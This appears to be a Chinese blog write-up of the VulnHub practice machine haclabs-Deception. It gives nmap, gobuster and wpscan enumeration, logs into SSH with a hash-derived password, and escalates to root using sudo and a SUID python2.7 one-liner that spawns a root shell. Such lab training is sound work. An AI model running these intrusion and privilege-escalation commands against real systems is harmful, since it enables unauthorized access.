本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
点击上方蓝字 关注我们
靶机系列测试 haclabs-Deception
1
介绍
最近暗月在每个星期六都有一个网络公开课,主要是技术分享,有需要的朋友关注公众号,今天这篇文章是昨晚做公开课的技术文档,会把一些技术细节分享在这里,这可能与直播有点出入,因为直播问题比较多,因此会更加详细。
2
靶机介绍
| 描述 | 详细 |
|---|---|
| Difficulty | Easy to Intermediate |
| Description | This a beginner level machine , getting a shell is a little bit harder, just think out of the box to get the shell.privilege escalation is easy once you get the shell.This machine has 3 flags. Each flag is present in the Home directory of particular user. Be ready to test your Linux skills. |
| Flag | 3 |
下载地址:
https://www.vulnhub.com/entry/haclabs-deception,427/
3
靶机测试过程
3.1 信息收集
3.1.1 nmap 扫描
nmap -sC -sV 192.168.0.191 -oA deception-port -Pn
2.1 访问主页
访问 ip 是一个 Ubuntu apache 的默认主页 根据扫描软件 发现主页的存在 wordpress 再用扫描工具探测软件下是否存在其他敏感文件。
http://192.168.0.191/wordpress
3.3 目录扫描
gobuster dir -u http://192.168.0.191/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php,html" -t 100
/index.php (Status: 301)
/wp-content (Status: 301)
/wp-login.php (Status: 200)
/wp-includes (Status: 301)
/readme.html (Status: 200)
/robots.html (Status: 200)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/wp-signup.php (Status: 302)
/hint.html (Status: 200)
http://192.168.0.191/wordpress//robots.html
http://192.168.0.191/wordpress//hint.html
Please collect all the API tokens availabe on the home page
请收集主页上所有可用的 API 令牌
3.4 收集 api 令牌
token api
5F4DCC3B5AA765D61D8327DEB882CF99
这个解密就是 password 可能这个就是密码。
3.5 收集 wordpress 账号
wpscan --url http://192.168.0.191/wordpress -e u
3.6 ssh 登录
密码 5F4DCC3B5AA765D61D8327DEB882CF99
3.7 获取第一个 flag
3.8 获取 haclabs 密码
cat .systemlogs
ssdsdsdsdsdqwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklqwertyuiop1234567890qazxdswedcfrfgvbhyyhnkiollokmkijnjuyhbhytgvfrdcxdesxzsyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklzaq123456vfr4567890mnbvcde4567890yuiopasdfghjklzxcvbnmzxcvbnmasdfghjklmnbvcxzsaq234567890-098765rewsxcvbnm,lpoiuytresxcbnmkoiuytredcyuiopasdfghjklzxcvbnmzxcvbnmasdfghjk!@#$dfkdfjdkfjdf!@#$fdjferheirdfdfksdjhfsg24356789yuiopasdfghjklzxcvbnmzxcvbnmasdfghjkljdfivnd"haclabs"jsdskdjskdjsldsklfjlkfdgl/dsfgkdhfgkdfgdjfhkagdhkdhgkkdzfkgdhfffgkhsfhgkdfhgkjlsfladjsflslfjlaaakjdflkaejflyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklNDmsfmbwebrm43564576nu4r50q824305485103601856035860020^&*()sdjfsdflsdfaldjfleragkrjgkfdghdfhksjdhgsghkskskfskgkshkshksfhkgkrtho43euvnd,m,mnhjkjhgfdrtfghj,;poiuytgbvftyhjkllksjhgdfrteuyue"A=123456789"fdsgfhndsffjladjksfjlsdfjlfghfieruyiehgkfnjuyhbvcftyu789876543wsxcvbnm,mju76543asxcferfgbnm,klokjhgbvcxsdfklsdfweri34o58uwotueagsdgjlyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklwlarqlewairp3wi4te0596q03496tiquieljkgrelrsjto5euyjgeldfhqowe5uy4seyjelsdglsoh45yeujhskehgesjhgsyuiopasdfghjklzxcvbnmzxcvbnmasdfghjkldsklflssldfjlsdfjsldfjsldfjld"+A[::-1]"fjlsdnvsldvnsujnhgfqwertyuioplkjhgfdsazxcvbnm,mnbvcxzasdfghjkl;poiuytrewqazxsedcvftghnklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjklyuiopasdfghjklzxcvbnmzxcvbnmasdfghjkldjfkdslfjsldfjsldfjlw4o32894829348293489289389
haclabs A=123456789 +A[::-1]
密码可能是 haclabs 987654321 haclabs987654321
密码 haclabs987654321
su haclabs
3.9 获取第二个 flag
。
3.10 特权提升
3.1.1 sudo 提权
sudo -l
看到输入密码就可以执行任何命令
3.10.2 suid 提权
find / -type f -perm -u=s 2>/dev/null
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
3.11,获取第三个 flag
4
关注公众号
如果本人你对有用,请点击收藏和分享。你的支持是我们的动力。
关注本公众号 不定期更新干货。